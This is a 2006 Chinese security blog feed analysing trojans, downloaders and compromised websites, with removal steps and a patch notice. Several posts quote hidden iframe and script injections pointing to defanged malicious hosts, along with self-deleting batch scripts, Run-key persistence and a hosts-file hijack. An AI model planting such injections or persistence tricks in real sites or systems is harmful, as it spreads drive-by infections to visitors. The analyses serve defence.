<![CDATA[kvirus.bokee.com]]> zh_cn Wed,08 Jun 2005 15:09:03 CST Wed,04 Oct 2006 09:08:00 CST http://www.bokee.com http://reg.bokee.com/account/web/img/logo.gif 博客网 http://www.bokee.com 您好,欢迎访问yunle110.bokee.com <![CDATA[wbem\winlogon.exe wbem\smss.exe aspwswind.dll是什么]]> .html 本文仅个人见解,可能有错误,转贴请注明出处

wbem\winlogon.exe

wbem\smss.exe

aspwswind.dll

 

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%system32%\wbem\winlogon.exe
c:\windows\system32\wbem\winlogon.exe

文档大小:683,008字节
编译语言:Borland Delphi 6.0 - 7.0

CRC32:37A52607
MD5:DC2970E97243A1C25FE9F9139A30122A
加壳方式:UPX 0.89.6 - 1.02 / 1.05 - 1.24 (Delphi) stub -> Markus & Laszlo
文件版本信息:
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               :
File Description           : Generic Hosts for WinService
File Version               : 1.0.0.0
Product Version            : 1.0.0.0
Company Name               : Microsoft
Internal Name              :
Legal Copyright            :
Original FileName          :


搜索本机和局域网共享的所有音乐软件、Flash和其他文

件.mp3.wma.avi.rm.rmvb..asf.mpeg.mpg.wmv.3gp.mp4.flv.exe.rar.zip.iso.msp.msi.swf.pdf.chm.ppt..pdg.aif.svx.snd.mid.voc.mmf.dat

.gz.z.cab.ace.arj.gzip.tar.7-zip.doc.txt.jpg.jif.jpeg.jpe.png.bmp.ico.psd
搜索本机的用户信息并在data文件夹中创建数据记录收集文件
dbisam.lck
DownFileList.blb
DownFileList.dat
DownFileList.idx
ShareFileList.dat
ShareFileList.idx
Users.dat
Users.idx
另可能保存为如下的扩展名文件
.dbk
.ibk
.bbk
.dup
.iup
.bup

启动winlogon.exe通过UDP6100监听218.64.170.2

生成文件
BoExplorer.rar
kugoo.mp3
msvsxml.dll并注册
下载:hxxp://upcfg.j7y.net/upcfg/Newdownurl.txt
aspwswin.dll并注册           (这个dll行为另外叙述)
SysOption.bin
c:\Downloads\   设置DefaultDownDir目录
监听剪切板,监视剪贴板IEURL文件类型为EXE ISO ASF AVI MP3 MPEG MPG MPGA RA RAR RM RMVB TAR WMA WMP WMV ZIP下载到c:\Downloads\

创建%a
path%目录指向%system32%\download\
umvdmoes32.dll
访问log.j7y.net (218.64.170.2)
aspwstate保持链接下载oobe\data\里的共享数据记录文件

inetsrv\SysOption.bin
wbem\SysOption.bin
AddrConfig.bin

\windows\temp
\winnt\temp
\Program Files\Kugoo\Incoming\  Kugoo我机里没有

update.txt
temp.dll并注册
下载kbd101ab.dll
DownBoExplorer.rar
BoExplorer.rar
创建GUID
VCFIWZDY32
{98ECDBDC-41C0-4124-8615-A0D0FAFAB047}
MFCExs32.DLL
csrss.exe
.bat
temp
@echo off
:loop
del "
if exist " goto loop
copy
del "
del %0
ForceDirectories
wbem\ddes\
inetsrv\Update\

创建注册表项
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Auto
Software\Microsoft\MediaPlayer\Player\Extensions\.fy
Permissions
Runtime
Software\Microsoft\MediaPlayer\Player\Extensions\.rmvb
Permissions
Runtime
Software\Microsoft\MediaPlayer\Player\Extensions\.rm
Permissions
Runtime
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}]
@="SysBackHelper Object"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\LocalServer32]
@="C:\\WINDOWS\\system32\\wbem\\winlogon.exe"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\ProgID]
@="VCFIWZDY32.VCFIWZDY"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\TypeLib]
@="{F63B08CD-3645-474F-8872-BA4293251FF9}"
[HKEY_CLASSES_ROOT\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\Version]
@="1.0"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}]
@="IDOVCFZWD"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\ProxyStubClsid]
@="{00020424-0000-0000-C000-000000000046}"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
[HKEY_CLASSES_ROOT\Interface\{468262B9-8400-4A49-B2E5-CE8550EB1347}\TypeLib]
@="{F63B08CD-3645-474F-8872-BA4293251FF9}"
"Version"="1.0"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}]
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0]
@="TestCom Library"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\0]
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\0\win32]
@="C:\\WINDOWS\\system32\\wbem\\winlogon.exe"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\FLAGS]
@="0"
[HKEY_CLASSES_ROOT\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\HELPDIR]
@="C:\\WINDOWS\\system32\\wbem\\"
[HKEY_CLASSES_ROOT\VCFIWZDY32.VCFIWZDY]
@="SysBackHelper Object"
[HKEY_CLASSES_ROOT\VCFIWZDY32.VCFIWZDY\Clsid]
@="{881F6F06-4620-4070-AD05-BD77D4C56661}"

PS:程序部分写的似迅雷、IDM类的下载软件:-)

 

#####################################

c:\windows\system32\aspwswind.dll
%system32%\aspwswind.dll

文档大小:240,640字节
编译语言:Borland Delphi 6.0 - 7.0
CRC32:BEC55536
MD5:1B80757DF4DCBC3D0DD6649C47B24714
加壳方式:UPX 0.80 - 1.24 DLL -> Markus & Laszlo
文件版本信息:
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 6,6,3791,1832
Product Version            : 6,6,3791,1832
============================================================
Product Name               : Microsoft(R) Windows(R) Operating System
File Description           : Background Intelligent Transfer Services
File Version               : 6.6.3791.1832
Product Version            : 6.6.3791.1831
Company Name               : Microsoft Corporation
Internal Name              : qmgr32.dll
Legal Copyright            : (C) Microsoft Corporation. All rights reserved.
Original FileName          : qmgr32.dll

创建如下GUID:
VCFIWZDY32.VCFIWZDY
从hxxp://upcfg.j7y.net/upcfg/plugbag.asp?ID=%d  (218.64.170.3)
下载生成
wbem\winlogon.exe
wbem\ddes\
drivers\etcdriver\
winnvusmb32.dll
csrss.exe
NFSWZWin32.dll
nvwrssvd32.dll
B0A208AE.dll
AgentInfo
wbem\SysOption.bin
drogeaswin32.msc
访问:
hxxp://www.163.com
创建:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\
ZYYd
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\
aspwstate
ZYYd
SYSTEM\ControlSet001\Services\aspwstate\Start
SYSTEM\CurrentControlSet\Services\aspwstate\Type
SYSTEM\CurrentControlSet\Services\aspwstate\ErrorControl
SYSTEM\CurrentControlSet\Services\aspwstate\DisplayName
ASP.NET Work State Service
SYSTEM\CurrentControlSet\Services\aspwstate\ImagePath
%SystemRoot%\System32\svchost.exe -k aspwstate
SYSTEM\CurrentControlSet\Services\aspwstate\Description
aspwstate
SYSTEM\CurrentControlSet\Services\aspwstate\ObjectName
LocalSystem
SYSTEM\CurrentControlSet\Services\aspwstate\Parameters\ServiceDll
aspwswin.dll

.bat
tempnb
@echo off
:loop
net stop aspwstate
del
if exist "
" goto loop
copy
net start aspwstate
del %0
生成:
a.exe
.fy
.fy
FlashPlayer80CX.dll
urlmons32.dll
COMAdEvent.dll
COMBoHEvent.dll
xmlpros.dll
NetWinDDE.dll
FlashPlayer80CX.dll
urlmons32.dll
COMAdEvent.dll
COMBoHEvent.dll
xmlpros.dll
NetWinDDE.dll
调用NFSWZWin32.dll
生成wbem\smss.exe  

(就是传说中的c:\windows\system32\wbem\smss.exe,不在本文说明之列)
访问hxxp://upcfg.j7y.net/upcfg/NewUpcfg.asp?ID=%d(保持文件更新)(218.64.170.3)

 

 

]]>
Wed,04 Oct 2006 09:08:00 CST 0
<![CDATA[qproecss.exe ineptpui.dll disckopy.exe avifli32.dl]]> .html qproecss.exe
文件版本信息如下:
Version Information
====================
Operating System           :
File Type                  : Unknown
File Sub-Type              : Unknown
File Version               : 0,0,0,0
Product Version            : 0,0,0,0
===========================================================

=
Product Name               : Microsoft(R) Windows(R)

Operating System
File Description           : Query Process Utility
File Version               : 5.1.2600.0 (xpclient.010817-

1148)
Product Version            : 5.1.2600.0
Company Name               : Microsoft Corporation
Internal Name              : qproecss
Legal Copyright            : (C) Microsoft Corporation. All

rights reserved.
Original FileName          : qproecss.exe
文件大小 : 21,070 Bytes
加壳方式:NsPacK V3.4-V3.5 -> LiuXingPing *
编译语言:MASM32 / TASM32
CRC32:F3CF148D
MD5:D08F139F462446B20CF807409A0A4235
BD报毒为:Malware.SBdld

启动qproecss.exe进程

生成文件如下:
Temp\del.bat
内容:-----------
:DeleteFile
del 自身 /A
if exist 自身 goto StillExists
del %0
exit
:StillExists
goto DeleteFile
--------------------
\qproecss.exe
\ineptpui.dll
\disckopy.exe
\avifli32.dll
创建注册表项
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

\run
Alexa="%system32%\qproecss.exe"
Ver="2006.07.20"

 

]]>
Mon,02 Oct 2006 15:22:34 CST 0
<![CDATA[中军网尖端军事论坛被挂DL马]]> .html 中军网尖端军事论坛被挂DL马
hxxp://bbs.milchina.com/   (218.92.120.58)
代码在网页底部:
<iframe src='hxxp://ujdmk1.chinaw3.com/xx.html' width='0' height='0' scrolling='no'

frameborder='0'></iframe>
hxxp://ujdmk1.chinaw3.com/xx.html  (218.30.100.32)
还原一次:
利用Adodb.Stream漏洞下载到本机更名haotian.bat
hxxp://ujdmk1.chinaw3.com/tufei.exe
加壳方式:UPolyX v0.5 [Overlay] *
编译语言:VB5.0
文件大小:5,389 字节
CRC32:78C808A6
MD5:2D4DC09E85DEA63E53918118B7581316
BD报毒为:Trojan.Downloader.VB.VX

生成:
wdfmgr32.exe
software\microsoft\windows\currentversion\run
.log="wdfmgr32.exe"
tpxdwn.dll(DL)

下载的东东处理方法:

附录:CISRT

【CISRT2006043】木马 svhost32.exe xydll.dll 解决方案

原贴:http://www.cisrt.org/bbs/redirect.php?fid=12&tid=360&goto=nextnewset

档案编号:CISRT2006043
病毒名称:Trojan-PSW.Win32.Delf.ns(Kaspersky)
病毒别名:
病毒大小:27,806 字节
加壳方式:Upack
样本MD5:46cb679780591eb8f74c87915eb103cc
样本SHA1:51d0f3534031451a4171acd64d74d42cd28453ff
发现时间:2006.09
更新时间:2006.09
关联病毒:
传播方式:通过恶意网页传播、其它木马下载


技术分析
==========

这个木马应该是梦幻西游木马,主程序使用的是“记事本”程序图标,原文件名mhh.exe,运行后复制自身到系统目录:%WINDOWS%\Download\svhost32.exe,释放文件:%System%\xydll.dll注入其它进程。

创建启动项:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"

清除步骤
==========

1. 结束%WINDOWS%\Download\svhost32.exe进程

2. 删除病毒文件:
%WINDOWS%\Download\svhost32.exe

3. 删除启动项:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"

4. 重新启动计算机

5. 删除病毒文件:
%System%\xydll.dll

]]>
Mon,02 Oct 2006 12:53:36 CST 0
<![CDATA[苏州大学-维普资讯-中文科技期刊数据库-镜像站V6.32]]> .html 苏州大学-维普资讯-中文科技期刊数据库-镜像站V6.32

hxxp://202.195.136.17/index.asp

首页有以下恶意代码
<iframe src="hxxp://enzosun.googlepages.com/joke.htm" width="0" height="0"frameborder="0"></iframe>

hxxp://enzosun.googlepages.com/joke.htm (64.233.179.95)放在googlepages上

利用Exploit.JS.ADODB.Stream.k下载:

hxxp://enzosun.googlepages.com/Server.exe
文件大小:285,310 字节
加壳方式:NSPACK3.7双层
AVP报毒为:Backdoor.Win32.Hupigon.gs
瑞星报毒为:Backdoor.Gpigeon.gen

]]>
Thu,28 Sep 2006 11:47:34 CST 0
<![CDATA[IE VML安全补丁发布了MS06-055--KB925486 ]]> .html MS06-055  KB925486

http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx

大小: 251 KB - 784 KB

现已确认在处理矢量标记语言 (VML) 的方式中有一个安全问题,攻击者可能会利用此问题危及运行 Microsoft Windows 的计算机的安全并获取对该计算机的控制权。您可通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装本更新程序后,可能需要重新启动计算机。

可以在下面的链接找到关于此更新的更多信息: http://go.microsoft.com/fwlink/?LinkID=73174

 

 

 

节前发布了,大家快打上补丁呀。

 

补丁信息:

 

Microsoft Security Bulletin MS06-055
Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)
Published: September 26, 2006

Version: 1.0

Summary
Who Should Read this Document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately

Security Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.

Caveats: None

Tested Software and Security Update Download Locations:

Affected Software:

• Microsoft Windows XP Service Pack 1 — Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=383C13DC-51A9-4B12-89E3-871A1A3DE98F
 
• Microsoft Windows XP Service Pack 2 — Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=B5F19858-4E86-4FD4-A264-E4823FF6D0A9
 
• Microsoft Windows XP Professional x64 Edition — Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=AFD3279C-6171-4F20-A36E-B9B56EE4C7F1
 
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 — Download the update

http://www.microsoft.com/downloads/details.aspx?FamilyId=AF8F3A58-BA7A-41BF-BB1B-3A9DDFDC3E27
 
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems — Download the update
 
http://www.microsoft.com/downloads/details.aspx?FamilyId=271E9C78-1C6A-443E-924D-43FD6D51E643

• Microsoft Windows Server 2003 x64 Edition — Download the update
 
http://www.microsoft.com/downloads/details.aspx?FamilyId=E2CB474F-FC1B-4B7D-A607-02A1528C6743

 

]]>
Wed,27 Sep 2006 09:01:17 CST 0
<![CDATA[小游戏-小鸡笨笨&巧拿情书]]> .html 看到访问客“涛的博客“上的小游戏,大家分享一下啦:-)

 

小鸡笨笨

 

 

巧拿情书

 

 

转自:http://staoo.bokee.com/viewdiary.13089257.html

      http://staoo.bokee.com/viewdiary.13089439.html

 

 

]]>
Fri,22 Sep 2006 08:42:17 CST 0
<![CDATA[哈哈笑话(中文搞笑第一门户)51haha.com and top008.com的问题]]> .html 白天没有事,去本站访客“私心的博客”逛了一下。hxxp://lgy520qjj.bokee.com/

网页上的个人介绍中有信息: 我是个很阳光的男孩!希望大家多回帖给我哦~~~ hxxp://haha.3322.net

于是去逛逛
hxxp://haha.3322.net/        (61.132.102.125)
hxxp://www.51haha.net/club/
hxxp://www.51haha.net        (61.151.249.244)
hxxp://www.51haha.com        (210.51.23.50)

hxxp://www.51haha.com内有如下这个js:(比较可疑)
<SCRIPT src='hxxp://www.51haha.com/js/88.js'></SCRIPT>
内容如下:
document.write('<a href=hxxp://www.world2.com.cn/jsp/syrenFinal/index.jsp target=_blank><img src=hxxp://www.top008.com/88.gif border=0></a><iframe src=hxxp://www.top008.com height=0 width=0 style="display:none"></iframe>');
看看这个网站吧:
hxxp://www.top008.com/     (219.129.216.201)广东省茂名市
hxxp://www.top008.com/index.htm
有如下作为:
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
下载:
hxxp://www.top008.com/nnwan.dll
hxxp://www.top008.com/rund1l32.exe
hxxp://www.top008.com/winst.dll
rund1l32.exe
终止RAVMON.EXE、KVMONXP.KXP
创建启动项
Software\Microsoft\Windows\CurrentVersion\Run
Cnsmins="rund1l32.exe cnsmin.dll -load -cls"
难道与Cnsmin有什么关系?
修改IE浏览器的Start Page设置
访问:hxxp://www.top008.com/msan.ini liveupdate 0.9 Ver
保持自动更新
下载:hxxp://www.top008.com/new.exe (目前不知道为啥失效)
tempnew.exe
除此之外,nnwan.dll还下载东东并调用winst.dll安装

以上目前报的比较少:-)
此站象是被植马。。。。。。

]]>
Thu,21 Sep 2006 23:44:35 CST 0
<![CDATA[NetworkDNS.exe、CControl.exe、kavsvc.exe]]> .html 样本:http://bbs.2dai.com/thread-428562-1-1.html

kavsvc主要部分
net start Service332244
c:\windows\system32\winloger.exe
net stop Service33224
c:\windows\system32\winloger.exe /uninstall /SILENT
c:\windows\system\Internet Explorer.exe
net stop Service332242
c:\windows\system\Internet Explorer.exe /uninstall /SILENT
c:\windows\system\iexplorer.exe
net stop Service332243
c:\windows\system\iexplorer.exe /uninstall /SILENT
c:\windows\system32\der.exe
c:\windows\system32\dlog.txt

 

NetworkDNS主要部分

访问hxxp://www.kdcent.com/download/upgrade.xml         (219.148.111.228)
version 13

下载:hxxp://www.kdcent.com/download/NetworkDNS.exe
样本附本

下载:hxxp://www.kdcent.com/download/baiduiebar.exe
百度IE-BAR
释放:bdgdins.dll、BDSrHook.dll

下载:hxxp://www.kdcent.com/download/baidusouba.exe
百度搜霸
释放:BaiduBar.dll、baidubar.dat、imglist.bmp、logo.bmp

下载:hxxp://www.kdcent.com/download/SVGHOST.EXE
访问:hxxp://gg.renren.com/cpio/ui.phtml?uid=103554&size=30&type=client&mata=0&bgcolor=ffffff 

(211.100.32.195)
界面广告

访问:hxxp://blog.kubao.com/NewArticleList.htm   (211.154.163.99)

下载:hxxp://update.llomo.com/scontrol/CControl.exe
访问:hxxp://update.llomo.com/scontrol/update.xml   (218.107.54.9)
<version>8
访问:hxxp://www.coopub.com/scontrol/update.xml   (218.107.54.9)
<version>8
下载:hxxp://update.llomo.com/scontrol/CControl.exe
下载:hxxp://www.coopub.com/scontrol/CControl.exe
这都是样本副本
host.exe

访问:hxxp://www.kdcent.com/jumpkb.aspx    (219.148.111.228)
访问:hxxp://www.5kys.com/DVImgList.aspx   (222.138.97.57)
访问:hxxp://www.musiccent.com             (222.138.97.57)
访问:hxxp://www.kdcent.com/jumpkd.aspx
访问:hxxp://www.kdcent.com/6330293/index.htm (219.148.111.228)

]]>
Wed,20 Sep 2006 12:58:26 CST 0
<![CDATA[个人安全上网的建议--阻止访问恶意作案的网页]]> .html “最近太多的垃圾进电脑了”,这是目前常见的现象。

主要来源还是在访问的网页中的恶意代码DOWN来的,并且有连环作案的现象

所以建议大家要好好审查一下网页(这个好象大多数上网者不常做,包括我自己:-))

如下安全措施(我觉得是上网者所应具备的):

1、防毒软件及防火墙

2、功能不错的浏览器或调整设置好的浏览器

(能进行图片、影音文件、动画、ActiveX控件、java、Scripts控制设置)

3、加装获取文件下载的软件,并开启文件下载监视(比较网际快车、IDM、迅雷等)

4、对出现异常情况,请立即终止浏览OR下载(终止不了的,拔了网线再处理)

5、终止后马上查毒,解决时间要点--在病毒发作初期处理干净

6、处理不掉的,然后到论坛求助

总之,要大家培养一个安全上网的习惯:-)

]]>
Wed,20 Sep 2006 10:26:08 CST 0
<![CDATA[hxxp://59.34.197.195/theopen.exe]]> .html theopen.exe
hxxp://59.34.197.195/theopen.exe

创建:
killme.bat
del theopen.exe
del killme.bat

修改hosts表
\system32\drivers\etc\hosts
559.34.197.239       163.com
559.34.197.239       about:blank
559.34.197.239       baidu.com
559.34.197.239       google.com
559.34.197.239       hao123.com
559.34.197.239       qq.com
559.34.197.239       sina.com
559.34.197.239       sina.com.cn
559.34.197.239       sohu.com
559.34.197.239       ttlttt.com
559.34.197.239       www.163.com
559.34.197.239       www.baidu.com
559.34.197.239       www.google.com
559.34.197.239       www.hao123.com
559.34.197.239       www.qq.com
559.34.197.239       www.sina.com
559.34.197.239       www.sina.com.cn
559.34.197.239       www.sohu.com

打开主页
C:\Program Files\Internet Explorer\IEXPLORE.EXE hxxp://59.34.197.239/theopen.asp
内容为:
<iframe src='open.asp?webname=theopen' width='0' height='0' frameborder='0'></iframe> <font face="宋体" size=2>
<p>Response 对象</font> <font face="宋体" size=2>错误 'ASP 0156 : 80004005'</font>
<p>
<font face="宋体" size=2>HTTP 头错误</font>
<p>
<font face="宋体" size=2>/theopen.asp</font><font face="宋体" size=2>,行 4</font>
<p>
<font face="宋体" size=2>已将 HTTP 头输出到客户端浏览器。任何对 HTTP 头的修改都必须在输出页内容之前进行。
</font>
访问:hxxp://59.34.197.239/open.asp?webname=theopen统计写入(这里有大量的访问页面垃圾)

下载:hxxp://59.34.197.195/theopen.exe

运行killme.bat删除自己

 

]]>
Fri,15 Sep 2006 13:58:28 CST 0
<![CDATA[带有恶意的“中国钢材价格网”]]> .html 中国钢材价格网--免费钢材价格资讯
hxxp://www.zh818.com=218.66.102.94
底部有
<iframe src="hxxp://www.zh818.com/0901/css.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="gt-html/sethomepage.htm" width=0 height=0 frameborder=0 border=0 marginwidth=0 marginheight=0

scrolling=no></iframe>
目的强制设置主页为hxxp://www.zh818.com


分析如下:
hxxp://www.zh818.com/0901/css.htm
AVP恶意程序:Exploit.JS.ADODB.Stream.k

又是“小僧空尽 过Sp2网页木马生成器”制造的

下载:
hxxp://www.zh818.com/0901/ms.exe  ASPack
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
c:\ie.exe
下载:hxxp://www.zh818.com/0901/ie.exe ASPack

AVP报毒:Trojan-Clicker.Win32.VB.oo

通过msxml2.dll访问:
hxxp://www.zh818.com/0901/adiepage.txt
hxxp://www.zh818.com/0901/adlist.txt
hxxp://www.zh818.com/0901/adset.txt
hxxp://www.zh818.com/0901/ieFavorites.txt
hxxp://www.zh818.com/0901/MMResult.asp
生成文件如下:
%WinDir%\Rundll32.exe
%WinDir%\killme.bat
内容为:
@echo off
sleep 100
del 自身
del killme.bat
cls
exit

创建:自启动项
Software\Microsoft\Windows\CurrentVersion\Run
%WinDir%\Rundll32.exe
创建%WinDir%\killme.bat
创建快捷方式:
%USERPROFILE%\Favorites\[InternetShortcut]
URL=hxxp://www.zh818.com/
同时设置主页:
Software\Microsoft\Internet Explorer\Main\
Start Page =hxxp://www.zh818.com/
禁用了主页修改属性
Software\Policies\Microsoft\Internet Explorer\Control Panel\
HomePage
运行%WinDir%\killme.bat删除自己


不知是网站官方的指意,还是怎么回事?
这样强制设置主页并驻留程序在用户电脑系统中,不是善意行为。
提高网站的点击率和名声也好,至少官方的做法要厚道些吧。

 

]]>
Fri,15 Sep 2006 13:07:34 CST 0
<![CDATA[v20060913出来了,作者真勤劳]]> .html hxxp://qidong.ssdlh.com/qidong.exe
v20060913

 

]]>
Thu,14 Sep 2006 17:45:00 CST 0
<![CDATA[tomsb美女图片网的毒瘤]]> .html 美女图片网的毒瘤
hxxp://www.tomsb.com/
<iframe src="hxxp://kkpic.net/jj3/" width="0" height="0" frameborder="0"></iframe>
<iframe src="hxxp://www.i3guo.com.cn/1.htm" width="0" height="0" frameborder="0"></iframe>
<iframe height="0" width="0" src="hxxp://afied.com/afied/ad0468.htm"></iframe>
<script language=javascript src=hxxp://www.369ip.com/popup.js></script>


hxxp://www.369ip.com/popup.js
hxxp://www.369ip.com/pop.htm
下载:hxxp://wmsjsf.com/admin.exe
AVP报:Worm.Win32.Viking.ad

 

hxxp://www.i3guo.com.cn/1.htm
<iframe src="hxxp://www.i3guo.com.cn/index.htm" width="1" height="1" frameborder="0"></iframe>
<script src='hxxp://s67.cnzz.com/stat.php?id=257633&web_id=257633' language='JavaScript'

charset='gb2312'></script>
hxxp://www.i3guo.com.cn/index.htm
下载:hxxp://www.i3guo.com.cn/ok.exe

 

hxxp://kkpic.net/jj3/
<iframe src="hxxp://kkpic.net/ggg/adc/index.htm" width="1" height="1"

frameborder="0"></iframe>
<iframe src="hxxp://kkpic.net/ggg/qqq/index.htm" width="1" height="1"

frameborder="0"></iframe>
<script src='hxxp://s37.cnzz.com/stat.php?id=109226&web_id=109226' language='JavaScript'

charset='gb2312'></script>
hxxp://kkpic.net/ggg/adc/index.htm
下载:hxxp://kkpic.net/ggg/qqq/top.gif
hxxp://kkpic.net/ggg/adc/
<iframe src="hxxp://kkpic.net/ggg/adc/wm.htm" width="1" height="1" frameborder="0"></iframe>
hxxp://kkpic.net/ggg/adc/wm.htm
下载:hxxp://kkpic.net/ggg/adc/123.exe
AVP报Trojan-Downloader.Win32.Small.dtk

 

hxxp://afied.com/afied/ad0468.htm
hxxp://afied.com/d/ads.htm
下载:hxxp://afied.com/d/ms32.exe
瑞星报:Trojan.DL.Delf.def
AVP报:Trojan-Downloader.Win32.Small.dti


总之:建议广大网友少去黄色网站或BBS,少惹事生非:-)

]]>
Thu,14 Sep 2006 16:47:56 CST 0
<![CDATA[陕西省人事考试信息网被植毒]]> .html 陕西省人事考试信息网被植毒
hxxp://www.sxrsks.cn/
<iframe src="hxxp://www.sxrsks.cn/Info/pic/image.htm" width="0" height="0" frameborder="0"></iframe><iframe

src="hxxp://www.mtxing.com/images/map/2/image.htm" width="0" height="0" frameborder="0"></iframe>

hxxp://www.mtxing.com/images/map/2/image.htm 目前失效

hxxp://www.sxrsks.cn/Info/pic/image.htm
<center><font color=red>对不起,您访问的页面不存在!</font><center>
<script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!

(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

hxxp://www.sxrsks.cn/Info/pic/windows.htm
下载:hxxp://www.sxrsks.cn/Info/pic/young.gif
文件大小:5,474 字节
AVP报Exploit.VBS.Phel.cy

]]>
Thu,14 Sep 2006 14:23:03 CST 0
<![CDATA[几天前的"腾飞在线 保定教育资源论坛"]]> .html 今天没有看到啦不过脚本链接仍然有效

几天前的"腾飞在线 保定教育资源论坛"

被值脚本:hxxp://www.ee44.net/[1]

以下全是Trojan-Downloader

59.34.197.239为广东省湛江市 电信ADSL

hxxp://59.34.197.239/kw1034.htm
下载:hxxp://203.171.236.199/kw1034.exe
ASPack 2.12 -> Alexey Solodovnikov [Overlay]
下载:hxxp://0.82211.net/999/a0001.exe
setup=Bindok.exe
setup=tshz093
setup=kw_rg_lyric_049.exe
setup=bind_40035.exe
setup=SetupCmd.exe
setup=5027.exe
setup=Project1.exe
setup=56.exe

hxxp://59.34.197.239/234567.htm
下载:hxxp://203.171.236.199/8888.EXE
中国宏网超级搜霸在线安装程序
ASPack 2.12 -> Alexey Solodovnikov [Overlay]
下载:hxxp://union.234567.com/down/hwsetup.exe
中国宏网超级搜霸在线安装程序
NSPack


hxxp://59.34.197.239/searchbar.htm
下载:hxxp://203.171.236.215/searchbar.exe
Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
流氓垃圾一大堆


再来说说a0001.exe

释放文件如下:
Bindok.exe          NSPack
tshz093.exe         ASPack 2.12 -> Alexey Solodovnikov
kw_rg_lyric_049.exe Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
bind_40035.exe      Nullsoft PiMP Stub [Nullsoft PiMP SFX] *
SetupCmd.exe        UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
5027.exe
Project1.exe        ASPack 2.12 -> Alexey Solodovnikov
56.exe

其中:

Bindok.exe NSPack
释放soft1.exe自解压为ok91-063.exe NSPack 释放ttt.exe、10063_setup.exe
释放soft2.exe自解压为ok-32.exe NSPack 释放32.exe、10232_setup.exe
释放soft3.exe自解压为ok-33.exe NSPack 释放33.exe、10233_setup.exe
释放soft4.exe自解压为ok-31.exe NSPack 释放31.exe、10231_setup.exe

Project1.exe  ASPack 2.12 -> Alexey Solodovnikov
下载:hxxp://0.82211.net/ebook/qidong.exe ASPack 2.12 -> Alexey Solodovnikov
下载:hxxp://0.82211.net/ebook/ebooktmp.exe自解压包
释放:eebooktmp.exe、Wing.exe
eebooktmp.exe NAPack 释放:RUNIE.exe、10234_setup.exe、10231_setup.exe
访问:hxxp://tj.82211.net/tj/ebook.htm
Wing.exe      ASPack 2.12 -> Alexey Solodovnikov
访问:
hxxp://vod.1234o.com/vip4.htm
hxxp://vod.1234o.com/vip3.htm
hxxp://vod.1234o.com/vip2.htm
hxxp://vod.1234o.com/vip1.htm
hxxp://tj.82211.net/tj/wingg.htm

56.exe自解压包释放101656.exe
UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

]]>
Wed,13 Sep 2006 14:38:38 CST 0
<![CDATA[QQ上传的病毒:芊芊聊天室]]> .html QQ病毒上传来的:芊芊聊天室

hxxp://www.kdfoam.com/manage/qianqianliao.htmlgo=5家族人气房,拒绝录象。传说中的靓女,性感的躯体,完美的身材,摇出你们的冲动。老规矩,200人开始,600人带你们进入高潮,哦也,速度砸吧```把房间顶穿

底部有:

<iframe src="hxxp://xgliao.net/setup.htm" width="0" height="0" frameborder="0">

下载:hxxp://xgliao.net/other/DNCJ.exe

 

]]>
Mon,11 Sep 2006 13:21:36 CST 0
<![CDATA[苏州房产信息网被挂马]]> .html 苏州房产信息网被挂毒
hxxp://www.512888.com/

